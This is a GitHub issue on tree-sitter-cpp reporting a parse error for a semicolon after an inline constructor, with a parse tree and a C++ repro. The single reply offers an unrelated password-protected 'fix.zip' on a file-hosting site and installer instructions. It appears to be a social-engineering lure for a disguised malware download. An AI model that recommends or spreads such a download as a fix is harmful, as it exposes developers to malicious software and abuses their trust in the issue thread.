### ISSUE TITLE
bug: error while parsing semicolon following inline constructor 

### ISSUE THREAD

**Issue by geniusisme** [tree-sitter/tree-sitter-cpp#285]
### Did you check existing issues?

- [ ] I have read all the [tree-sitter docs](https://tree-sitter.github.io/tree-sitter/using-parsers) if it relates to using the parser
- [X] I have searched the existing issues of tree-sitter-cpp

### Describe the bug

Notice the semicolon at line 2.

### Steps To Reproduce/Bad Parse Tree

Just paste the code in playground: https://tree-sitter.github.io/tree-sitter/playground

```
[translation_unit](https://tree-sitter.github.io/tree-sitter/playground#) [0, 0] - [4, 0]
  [struct_specifier](https://tree-sitter.github.io/tree-sitter/playground#) [0, 0] - [3, 1]
    name: [type_identifier](https://tree-sitter.github.io/tree-sitter/playground#) [0, 7] - [0, 8]
    body: [field_declaration_list](https://tree-sitter.github.io/tree-sitter/playground#) [1, 0] - [3, 1]
      [function_definition](https://tree-sitter.github.io/tree-sitter/playground#) [2, 4] - [2, 9]
        declarator: [function_declarator](https://tree-sitter.github.io/tree-sitter/playground#) [2, 4] - [2, 7]
          declarator: [identifier](https://tree-sitter.github.io/tree-sitter/playground#) [2, 4] - [2, 5]
          parameters: [parameter_list](https://tree-sitter.github.io/tree-sitter/playground#) [2, 5] - [2, 7]
        body: [compound_statement](https://tree-sitter.github.io/tree-sitter/playground#) [2, 7] - [2, 9]
      [ERROR](https://tree-sitter.github.io/tree-sitter/playground#) [2, 9] - [2, 10]
```

### Expected Behavior/Parse Tree

Semicolon at that position is allowed. Don't know how should it represented in the tree, but there was a similar problem, may be simillar solution will suffice: https://github.com/tree-sitter/tree-sitter-cpp/issues/35

### Repro

```cpp
struct S
{
    S(){};
};
```

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."
